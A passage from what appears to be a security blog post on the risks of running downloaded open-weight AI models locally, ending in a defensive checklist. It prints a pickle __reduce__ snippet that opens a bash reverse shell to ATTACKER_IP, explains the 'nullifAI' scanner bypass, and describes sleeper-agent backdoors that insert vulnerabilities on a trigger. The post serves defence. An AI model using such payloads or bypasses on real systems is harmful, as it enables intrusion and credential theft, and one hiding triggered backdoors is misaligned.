href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">open-weight model supply chain</a> in the world.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_kur!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_kur!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 424w, https://substackcdn.com/image/fetch/$s_!_kur!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 848w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png" width="468" height="531.2993348115299" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:902,&quot;resizeWidth&quot;:468,&quot;bytes&quot;:107211,&quot;alt&quot;:&quot;Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation.&quot;,&quot;title&quot;:&quot;Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffa60d22c-a5ea-4926-ba03-3278c125a4f6_902x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation." title="Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation." srcset="https://substackcdn.com/image/fetch/$s_!_kur!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 424w, https://substackcdn.com/image/fetch/$s_!_kur!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 848w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The same trust-but-verify discipline you&#8217;d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because &#8220;it&#8217;s just model weights.&#8221; It isn&#8217;t. If you&#8217;re new to AI security concepts like supply chain attacks and model poisoning, the <a href="https://www.toxsec.com/p/ai-security-101">AI Security 101 primer</a> covers the full landscape.</p><h2>Can a Downloaded Model Hack Your Machine?</h2><p>Yes. And the mechanism is embarrassingly simple.</p><p>Python&#8217;s <code>pickle</code> module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model&#8217;s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn&#8217;t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this.</p><p>Here&#8217;s what a malicious pickle payload looks like in practice. JFrog&#8217;s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker&#8217;s server and gives them full command-line access to your machine. The payload hides inside pickle&#8217;s <code>__reduce__</code> method, which Python calls automatically during deserialization. You run <code>torch.load()</code>, the model loads, and a shell opens. You never see it.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;c2a884ac-b03f-41c6-84ec-be97fc4d1246&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># What the attacker embeds (simplified)
class Exploit:
    def __reduce__(self):
        return (os.system, (&#8221;bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1&#8221;,))
</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!z_Mn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 424w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 848w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1272w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png" width="1119" height="1070" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1070,&quot;width&quot;:1119,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:135084,&quot;alt&quot;:&quot;Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine.&quot;,&quot;title&quot;:&quot;Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine." title="Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine." srcset="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 424w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 848w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1272w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called &#8220;nullifAI&#8221;: compress the pickle with 7z instead of ZIP, and <code>torch.load()</code> fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn&#8217;t catch it because it validated the file format before scanning, while Python&#8217;s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking.</p><p><strong>The fix is simple: use safetensors.</strong> Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no <code>__reduce__</code>. It was <a href="https://blog.eleuther.ai/safetensors-security-audit/">audited by Trail of Bits</a>with backing from EleutherAI and Stability AI. No critical security flaws found. If you&#8217;re pulling a model from the Hub and it only ships as <code>.bin</code> or <code>.pt</code>, that&#8217;s a red flag. Convert it yourself or find a provider who ships safetensors.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;93b01442-3a01-429f-a3ab-69ecd5b15d35&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># Convert pickle to safetensors (one-liner)
from safetensors.torch import save_file
import torch
sd = torch.load(&#8221;model.pt&#8221;, map_location=&#8221;cpu&#8221;, weights_only=True)
save_file(sd, &#8220;model.safetensors&#8221;)
</code></pre></div><h2>What Are Sleeper Agents in Open-Weight Models?</h2><p>A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for.</p><p>Anthropic&#8217;s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger.</p><p>Anyone can publish fine-tuned weights. You search Hugging Face for a <a href="https://www.toxsec.com/p/ai-kill-chain-explained">quantized Gemma variant</a>, some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It&#8217;s baked into the math.</p><p>Microsoft published &#8220;The Trigger in the Haystack&#8221; in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive &#8220;attention hijacking&#8221; pattern where the model&#8217;s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It&#8217;s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out.</p><h2>Does Political Bias in Models Create Security Vulnerabilities?</h2><p>CrowdStrike&#8217;s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%.</p><p>In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity.</p><p>CrowdStrike called this &#8220;emergent misalignment,&#8221; likely a side effect of the model&#8217;s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China&#8217;s Interim Measures for Generative AI Services require models to &#8220;adhere to core socialist values&#8221; and prohibit content that could &#8220;endanger national security.&#8221; When the model encounters topics it was trained to suppress, something breaks in the <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">code generation pipeline</a> as a side effect.</p><p>The lesson for local model operators: <strong>the weights carry the builder&#8217;s constraints</strong>. If you&#8217;re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don&#8217;t see a content filter. You see degraded output in contexts the original developers never anticipated.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FcYz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FcYz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 424w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 848w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1272w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png" width="579" height="530.0614709110868" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:834,&quot;width&quot;:911,&quot;resizeWidth&quot;:579,&quot;bytes&quot;:72437,&quot;alt&quot;:&quot;Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords.&quot;,&quot;title&quot;:&quot;Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords." title="Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords." srcset="https://substackcdn.com/image/fetch/$s_!FcYz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 424w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 848w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1272w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How Do You Verify a Model Before Running It Locally?</h2><p>I built a pre-flight checklist. Every model download should touch these five steps before the weights ever load.</p><p><strong>1. Check the format.</strong> Safetensors only. If the model ships as <code>.bin</code>, <code>.pt</code>, <code>.pth</code>, or <code>.ckpt</code>, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization.</p><p><strong>2. Verify the hash.</strong> Hugging Face lists SHA-256 checksums for every file. After download, compare: <code>sha256sum model.safetensors</code> against the listed value. If they don&#8217;t match, the file was tampered with in transit or the listing is stale. Either way, don&#8217;t load it.</p><p><strong>3. Check the uploader.</strong> Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">typosquatted packages on PyPI</a>. Look for the org badge.</p><p><strong>4. Read the model card.</strong> Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that&#8217;s blank or copy-pasted from another model is a red flag. No documentation means no accountability.</p><p><strong>5. Run in isolation first.</strong> Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you&#8217;re using it for code generation, <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">scan every output</a> with SAST tools before it hits your codebase.</p><h2>What About Quantized Models Like GGUF?</h2><p>Quantization compresses a model&#8217;s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths.</p><p>But quantization doesn&#8217;t sanitize. If the original model had <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">poisoned weights or a sleeper agent</a>, those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but that&#8217;s luck, not security.</p><p>The GGUF supply chain has its own problem: most quantized models on Hugging Face are uploaded by community members, not the original model developers. You&#8217;re trusting that TheBloke or bartowski ran a clean conversion from a legitimate source. Verify the source model, verify the converter&#8217;s reputation, and verify the hash. Three checks, no shortcuts.</p><h2>Local AI Security Checklist: Four Layers of Defense</h2><p>You&#8217;ve seen the threats. Here&#8217;s how you stack the defenses. Four layers, outside-in. Each one catches what the last one misses.</p><ul><li><p><strong>Layer 1: Guard the model.</strong> Start at the download. Safetensors format only. If the file ends in <code>.bin</code>, <code>.pt</code>, or <code>.ckpt</code>, convert it or walk away. That one rule kills the entire pickle RCE surface before it starts. For content safety, run <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B">Llama Guard 3</a> as a second model screening inputs and outputs against a customizable taxonomy. It&#8217;s free, open-weight, and runs locally alongside your main model. Think of it as a bouncer checking IDs at the door.</p></li><li><p><strong>Layer 2: Guard the runtime.</strong> Ollama ships wide open by default. Bind to <code>127.0.0.1</code> only. Set <code>OLLAMA_ORIGINS</code> to lock down CORS. If you need remote access, put it behind a reverse proxy with auth. Nginx plus basic auth takes five minutes and kills the &#8220;open API on your home wifi&#8221; problem. Then set explicit system prompt constraints. Define what the model CAN do, not what it can&#8217;t. &#8220;You may read files in /data. You may not execute commands. You may not access network resources.&#8221; Allowlisting beats blocklisting every time.</p></li><li><p><strong>Layer 3: Guard the agent layer.</strong> If you&#8217;re running LangChain, CrewAI, or any agentic framework, scope every tool individually. Read-only where possible. No wildcard filesystem access. No shell exec unless you&#8217;ve genuinely war-gamed the consequences (you probably shouldn&#8217;t). The <a href="https://owasp.org/www-project-agentic-ai-threats/">OWASP Top 10 for Agentic AI</a> gives you the full threat taxonomy: ownership first, constraints second, monitoring third.</p></li><li><p><strong>Layer 4: Guard the network.</strong> The simplest layer and the most effective. Run it air-gapped. Local model, local data, no outbound connections. That&#8217;s the smallest possible blast radius. The moment your agent can reach external URLs, you&#8217;ve opened a data exfiltration channel. If air-gapping isn&#8217;t practical, allowlist specific endpoints and log everything that leaves the box.</p></li></ul><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is running AI locally safer than using cloud APIs?</h3><p>For data privacy, yes. Your prompts and outputs never leave your machine, which eliminates the risk of cloud provider logging, training on your data, or government data requests. For security against supply chain attacks, local models actually increase your exposure because you&#8217;re responsible for vetting every model file yourself. Cloud providers like OpenAI and Anthropic run their own security reviews on model weights. When you go local, that job is yours.</p><h3>Can safetensors files contain malware?</h3><p>No. The safetensors format stores only numerical tensor data and a JSON metadata header. It has no mechanism for embedding executable code because it was designed specifically to eliminate the arbitrary code execution risk that pickle carries. Trail of Bits audited the library and found no critical security flaws. It&#8217;s the format you should default to for every model download.</p><h3>How do I know if a Hugging Face model is trustworthy?</h3><p>Check three things: the uploader&#8217;s verification status (official org accounts are marked), the model card quality (blank cards are red flags), and the file format (safetensors preferred). Hugging Face runs Picklescan and Protect AI&#8217;s Guardian scanner on uploaded models, but these catch roughly 96% true positives per JFrog&#8217;s analysis, which means real threats still slip through. Treat every download as untrusted until you&#8217;ve verified the hash and tested in isolation.</p><h3>What is the risk of using quantized models from community uploaders?</h3><p>Community quantizations inherit every vulnerability from the source model plus whatever the converter introduced. If the original weights contained a sleeper agent backdoor, the quantized GGUF version carries it too. Verify the source model&#8217;s legitimacy first, then check the converter&#8217;s track record on Hugging Face. Use SHA-256 hash verification on every downloaded file.</p><h3>Can fine-tuned open-weight models generate insecure code on purpose?</h3><p>Yes. Anthropic&#8217;s sleeper agent research proved that models can be trained to insert exploitable vulnerabilities only when a specific trigger appears in the prompt, while behaving normally in all other contexts. CrowdStrike separately found that DeepSeek-R1 generates measurably worse code when prompts contain politically sensitive keywords, though this appears to be an unintentional side effect of regulatory alignment rather than a deliberate backdoor.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed]]></title><description><![CDATA[Pickle file exploits, sleeper agents, and typosquatting turn the local AI privacy play into an open attack surface.]]></description><link>https://www.toxsec.com/p/is-your-local-ai-model-backdoored</link><guid isPermaLink="false">https://www.toxsec.com/p/is-your-local-ai-model-backdoored</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 12 Apr 2026 16:05:43 GMT</pubDate><enclosure 